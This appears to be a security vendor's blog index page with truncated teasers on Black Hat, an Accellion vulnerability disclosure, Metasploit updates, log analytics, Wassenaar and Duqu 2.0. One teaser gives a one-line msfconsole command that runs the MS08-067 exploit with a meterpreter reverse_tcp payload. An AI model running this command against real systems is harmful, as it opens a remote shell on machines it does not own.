Events
The Black Hat Attendee Guide, Part 1 - How to Survive Black Hat
If you're like me, you have wanted to go to Black Hat for ages. If you're going, have a game plan. For first timers, this series will be a primer full of guidance and survival tips. For returning attendees, this will help maximize your experience at Black Hat.
First, I want to give you perspective on my bias, coloring guidance offered here. My slant is that of someone who was a booth babe (sales engineer), a speaker, an attendee, Review Board member and former Gen
Vulnerability Disclosure
R7-2015-08: Accellion File Transfer Appliance Vulnerabilities (CVE-2015-2856, CVE-2015-2857)
This disclosure covers two issues discovered with the Accellion File Transfer Appliance, a device used for secure enterprise file transfers. Issue R7-2015-08.1 is a remote file disclosure vulnerability, and issue R7-2015-08.2 is a remote command execution vulnerability. Metasploit modules have been released for both issues, as of Pull Request 5694.
According to the vendor, both issues were addressed in version
Msfcli is No Longer Available in Metasploit
Hi everyone,
This January, we made an announcement about the deprecation of Msfcli, the
command line interface version for Metasploit. Today we are ready to say
good-bye to it. Instead of Msfcli, we recommend using the -x option in
Msfconsole. For example, here's how you can run MS08-067 in one line:
./msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set RHOST ; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST ; run"
You can also leverage things like resource scripts o
IT Ops
Ditch the Debugger and Use Log Analysis Instead
This guest blog post is written by Matthew Skelton, Co-founder and Principal
Consultant at Skelton Thatcher Consulting.
--------------------------------------------------------------------------------
Summary: As a Developer, you cannot attach the debugger to your application in
Production, but you can use logging in a way that helps you easily diagnose
problems in both development AND Production. You also get to make friends with
Operations people – win! The applications we’re developing and
IT Ops
10 Best Practices for Log Management & Analytics: Part 1
This 3-part series covers Logentries' 10 best practices for log management and analytics. To download the complete article, click here.
As applications, hosting environments and infrastructure continue to grow in
size and complexity, having a well defined set of logging strategies and
practices is more important than ever.
In Logentri
IT Ops
Using Log Data Streams for Real-Time Analytics: Part 1
This 3-part series explores the definition and benefits of using log data streams and real-time analytics for some common IT Ops use cases. To download the complete article, click here.
Analytics tools are often focused on analyzing historical data. Taking a sample
of data from historical events, you can perform calculations to determine what
happened during that period of time and report on you
IT Ops
How to Implement ANTLR4 Autocomplete
Antlr4 is a new iteration of the popular Antlr parse tree generator. Antlr4 features great documentation and an in-depth book on the subject. However, the topic of autocompletion lacks any substantive material. I hope this article will steer you in the right direction if you are looking to implement autocomplete functionality
Metasploit Weekly Wrapup
Weekly Metasploit Wrapup: Two More Flash Exploits
While Adobe has made great progress in releasing both regular and emergency updates to Flash, it's becoming clear that Flash itself is becoming an albatross around the neck of every browser.
Discover Assets Dynamically with Infoblox DHCP
A highlight of the Nexpose 5.15 release is the addition of Infoblox Trinzic DDI to the growing list of Dynamic Discovery sources. With nearly 8,000 customers worldwide, Infoblox is a market leader in DNS, DHCP and IP address management. Building upon existing support for Microsoft DHCP log monitoring, released this past spring, Nexpose customers that use Infoblox to manage DHCP activity can now detect previously unknown devices whenever they connect to the network, providing a more complete un
IT Ops
Announcing Logentries as Google Cloud Platform's First Log Analytics Partner
Today we're excited to announce our partnership with Google Cloud Platform, making Logentries the first provider of log analytics for Google Cloud customers.
Logentries' Google Cloud integration enables Google customers to perform advanced analysis on their log data,
IT Ops
Introducing Logentries NEW Query Language: LEQL
We are excited to announce that Logentries' new SQL-like query language, LEQL, is now available for more advanced analytics and easy extraction of valuable insights from your log data.
A SQL-Like Query Language
If you’ve ever used SQL, LEQL should feel familiar. In fact, Logentries already
supports a number of SQL-like search functions, including:
* SUM: Sums a set of values
*
IT Ops
How to Log with the Docker Logentries Container
Logentries offers a variety of ways to get logs out of your containerized environment, including our Linux Agent, application plugin libraries, and Syslog. In this post we'll cover collecting and forwarding logs via our Docker Logentries Container, which requires Docker 1.5 or higher.
To configure the Docker Logentries Container you’ll need to do the following:
* Create a destination log in your Logentries account to record your Docker
lo
Metasploit
Wassenaar Arrangement - Frequently Asked Questions
The purpose of this post is to help answer questions about the Wassenaar Arrangement. You can find the US proposal for implementing the Arrangement here, and an accompanying FAQ from the Bureau of Industry and Security (BIS) here. For Rapid7's take on Wassenaar, and information on the comments we intend to submit to BIS, please read this companion pie
Malware
What Exactly is Duqu 2.0?
Overview:
Duqu, a very complex and modular malware platform thought to have gone dark in late 2012, has made its appearance within the environment of Kaspersky Labs. Dubbed "Duqu 2.0" by Kaspersky, the level of complexity found within the malware represents a high level of sophistication, skill, funding and motivation seen by nation-sponsored actors. Infections related to this malware have reveale
How to be a Combination King
I recently spent a wonderful week in London to participate in Infosecurity Europe as part of a larger group of internationally-based Rapid7 employees. If you've been to many events, you know that vendors quite often come up with clever ways to attract people to their booth through giveaways, technical presentations, and product demonstrations. Lucky for me, our booth happened to be right next to a vendor who had a rather neat contest involving a keypad lock